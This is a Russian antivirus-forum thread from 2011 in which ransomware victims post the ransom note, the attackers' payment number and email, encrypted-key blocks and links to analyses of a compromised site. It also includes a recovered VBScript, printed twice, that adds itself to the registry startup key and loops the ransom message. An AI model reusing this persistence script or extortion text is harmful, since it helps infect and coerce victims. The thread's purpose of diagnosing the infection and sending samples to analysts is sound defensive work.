42 ответов в этой теме

[Mefix]

Здраствуйте. Компьютер попал под заражение вируса Encoder, неизвестной версии. Сам вирус был уже частично удалён. Прилагаю файлы которые остались в системе. И сами зашифрованные файлы. Очень много doc и других файлов с приставкой _crypt которые нужно востановить. Примеры некоторых файлов в архиве. Скорее всего закодировано с помощью программы MyWinLocker

Вы запустили программу шифрования файлов, в результате Ваши файлы зашифрованы.
Для восстановления Ваших файлов Вам необходимо приобрести наш дешифратор.
Для приобретения дешифратора Вам необходимо пополнить номер 89648799250 на сумму 500 руб.,
после чего связаться с нами по email cryptosoftsup@yahoo.com для получения дешифратора.
You executed the program of files encrypting, as a result your files are encrypted.
For restoration of your files it is necessary for you to get our decryptor.
For getting of the decryptor it is necessary for you to pay 500 RUR to number 89648799250,
then to contact us on email cryptosoftsup@yahoo.com for getting decryptor.
=== KEY ===
010200000266000000A40000BE16B43DFE89E25E
87AE871A8820457E9D1B57346D8B93E2529363C8
3DEF1D6F4ECAB53B30E12A9004795F13B96D69E1
3D995BEC9C5C61068BF894E9D14B4629
=== END ===

Прикрепленные файлы:

•  Безымянный.jpg   74,04К   1 Скачано раз
•  DRWEB.zip   1,7Мб   1 Скачано раз

[Ефим12345678]

У меня тоже такая же проблема. Что делать не знаю. Половина файлов не работает. Нельзя ничего открыть

[Borka]

Отправьте несколько закриптованных файлов разных типов в Вирлаб: vms.drweb.com/sendvirus, сопроводите подробными комментариями. Номера тиктов сюда.

[sniper]

И заявление в полицию не мешало бы,уж сколько можно.

[Mefix]

[drweb.com #3063173]

Разговаривал. Меня просят прислать файл вируса. НО ЕГО У МЕНЯ НЕТУ!!! Ничего не скачивали, единственное на что сейчас ругаеся антивирускник это на сайт www.chastnik.ru, на загружаемый пордством него файл in[1].htm, а на компе только файл sd.vbs остался от сиего творчества. Который прописывал сам себя в автозагрузку. Собстно вот(файла DE22.tmp нету:

n="C:\Users\Lisina\AppData\Local\Temp\DE22.tmp"
on error resume next
WScript.Sleep(5000)
CreateObject("Scripting.FileSystemObject").DeleteFile n
v="C:\Users\Lisina\AppData\Local\Temp\sd.vbs"
CreateObject("WScript.Shell").RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\gpc",v,"REG_SZ"
do
MsgBox "Вы запустили программу шифрования файлов, в результате Ваши файлы зашифрованы."+chr(13)+chr(10)+"Для восстановления Ваших файлов Вам необходимо приобрести наш дешифратор."+chr(13)+chr(10)+"Для приобретения дешифратора Вам необходимо пополнить номер 89648799250 на сумму 500 руб.,"+chr(13)+chr(10)+"после чего связаться с нами по email cryptosoftsup@yahoo.com для получения дешифратора."+chr(13)+chr(10)+""+chr(13)+chr(10)+"You executed the program of files encrypting, as a result your files are encrypted."+chr(13)+chr(10)+"For restoration of your files it is necessary for you to get our decryptor."+chr(13)+chr(10)+"For getting of the decryptor it is necessary for you to pay 500 RUR to number 89648799250,"+chr(13)+chr(10)+"then to contact us on email cryptosoftsup@yahoo.com for getting decryptor.", 69680, "Attention!"
loop while 1=1

Сообщение было изменено SergM: 28 Декабрь 2011 - 13:49

[Ефим12345678]

Отправил файлы на vms.drweb.com/sendvirus. Тикет [drweb.com #3063428].

[Borka]

Уберите файл с форума и зашлите его в Вирлаб в тот за тикет.

[Ефим12345678]

www.chastnik.ru Я на сайт частника часто захожу, последнюю неделю там взломы его каждый день! Переадресация на ГУГЛ С НЕГО! Может это с него и зараза вся аошла. Да ещё и этот вордпресс, зря его на нём делали.

[drweb.com #3063173]

Разговаривал. Меня просят прислать файл вируса. НО ЕГО У МЕНЯ НЕТУ!!! Ничего не скачивали, единственное на что сейчас ругаеся антивирускник это на сайт www.chastnik.ru, на загружаемый пордством него файл in[1].htm, а на компе только файл sd.vbs остался от сиего творчества. Который прописывал сам себя в автозагрузку....

[Mefix]

Уберите файл с форума и зашлите его в Вирлаб в тот за тикет.

Мне по поводу этого файла ответили что это не то, это не вирус. Сил нету если честно.

Сообщение было изменено Mefix: 26 Декабрь 2011 - 15:44

[Ефим12345678]

Да. Написали что им нужен сам троян. А у меня только пол компа перекодированных файлов и капец)).

Сообщение было изменено Алексей Самохвалов: 26 Декабрь 2011 - 15:50

[Mefix]

PS: Причём DRweb на этом сайте что-то не определяет как вирус NN-ое наполнение, а Microsoft Security Essentie, который стоит на одной из машин организации, определяет. Trojan.JS/BlacoleRef.G и как Trojan.JS/Redirector.GQ

Email кстати рабочий. и они мне ответили.

Сообщение было изменено Mefix: 26 Декабрь 2011 - 15:54

[Dmitry Shutov]

Интересно....покапал тут не много..и вот что нарыл (

chastnik.ru - Hidden Iframes

http://jsunpack.jeek...b83d0d0f44c4df5

Вот что в Hidden Iframes

http://www.virustota...912a-1324914111

http://wepawet.isecl...fd56148&type=js

А вот тут самое интересное

http://jsunpack.jeek...c6bb6d1578eaeb0

<html><body><input type="input" name="NkVbGor" value="length" style="display:none"><span style="visibility:hidden">

http://www.virustota...3bd1-1324914324

http://wepawet.isecl...70d0fca&type=js - malicious


drweb.com #3063709
drweb.com #3063741
drweb.com #3064183

Хотелось что бы аналитики по лучше посмотрели, может что дельное найдут.

Прикрепленные файлы:

•  Chastnic.jpg   25,29К   3 Скачано раз

Сообщение было изменено Dmitry Shutov: 26 Декабрь 2011 - 19:42

[Dmitry Shutov]

[drweb.com #3063173]

Разговаривал. Меня просят прислать файл вируса. НО ЕГО У МЕНЯ НЕТУ!!! Ничего не скачивали, единственное на что сейчас ругаеся антивирускник это на сайт www.chastnik.ru, на загружаемый пордством него файл in[1].htm, а на компе только файл sd.vbs остался от сиего творчества. Который прописывал сам себя в автозагрузку. Собстно вот(файла DE22.tmp нету:

n="C:UsersLisinaAppDataLocalTempDE22.tmp"
on error resume next
WScript.Sleep(5000)
CreateObject("Scripting.FileSystemObject").DeleteFile n
v="C:UsersLisinaAppDataLocalTempsd.vbs"
CreateObject("WScript.Shell").RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRungpc",v,"REG_SZ"
do
MsgBox "Вы запустили программу шифрования файлов, в результате Ваши файлы зашифрованы."+chr(13)+chr(10)+"Для восстановления Ваших файлов Вам необходимо приобрести наш дешифратор."+chr(13)+chr(10)+"Для приобретения дешифратора Вам необходимо пополнить номер 89648799250 на сумму 500 руб.,"+chr(13)+chr(10)+"после чего связаться с нами по email cryptosoftsup@yahoo.com для получения дешифратора."+chr(13)+chr(10)+""+chr(13)+chr(10)+"You executed the program of files encrypting, as a result your files are encrypted."+chr(13)+chr(10)+"For restoration of your files it is necessary for you to get our decryptor."+chr(13)+chr(10)+"For getting of the decryptor it is necessary for you to pay 500 RUR to number 89648799250,"+chr(13)+chr(10)+"then to contact us on email cryptosoftsup@yahoo.com for getting decryptor.", 69680, "Attention!"
loop while 1=1

http://www.virustotal.com/file-scan/report.html?id=ab3d11fb2bac52665bb5461d2325b128f514b710c9fe478f232917bb4ef2a933-1324917809

Trojan-Ransom.VBS.Agent.e - Касперы

[Mefix]

Спасибо за информацию. Попробую пару файлов Ransom дешифровщику скормить. мож что выйдет.

[Rumen Dimitrov Kostadinov]

Вы запустили программу шифрования файлов, в результате Ваши файлы зашифрованы.
Для восстановления Ваших файлов Вам необходимо приобрести наш дешифратор.
Для приобретения дешифратора Вам необходимо пополнить номер 89648799250 на сумму 500 руб.,
после чего связаться с нами по email cryptosoftsup@yahoo.com для получения дешифратора.

You executed the program of files encrypting, as a result your files are encrypted.
For restoration of your files it is necessary for you to get our decryptor.
For getting of the decryptor it is necessary for you to pay 500 RUR to number 89648799250,
then to contact us on email cryptosoftsup@yahoo.com for getting decryptor.

=== KEY ===
010200000266000000A400003FB0CE88C51F0611
02E4A03EE27099BEA83737EBD2CA9B90F930DAA9
0917750F6F9F91287A125B380644EAD741F3C239
B15B83E7CD29D717F24EF71EB4936559
=== END ===

[Borka]

Румен, зашлите несколько зашифрованных файлов в Вирлаб: http://vms.drweb.com/sendvirus

[Mefix]

А ещё лучше вышлите вирус )))) Который файлы зашифровал )))

[mrbelyash]

<p>

А ещё лучше вышлите вирус )))) Который файлы зашифровал )))

Так то вы просили,чтобы в бюлдере появилась опция самоудаления?

Сообщение было изменено mrbelyash: 27 Декабрь 2011 - 17:13

[Mefix]

Эм... Если честно не понял вопроса. В каком "бюльдере" drweb? Или билде вируса? Кхм... Вы видимо меня не за того приняли. А лучше по делу. Ибо оч надо восстановить документы. Вот где его сотрудница подхватила фиг знает. Но скорее с одного из скрытых редиректов www.chastnik.ru. Пытался на тестовую систему без антивирусов подхватить. Фиг... Ничего не получилось. (((

[v.martyanov]

Ну, то что я видел говорит о распространении через exploit. И в нашем случае - RSA-512, что, вроде, вскрываемо, но надо разбираться как инструменты использовать.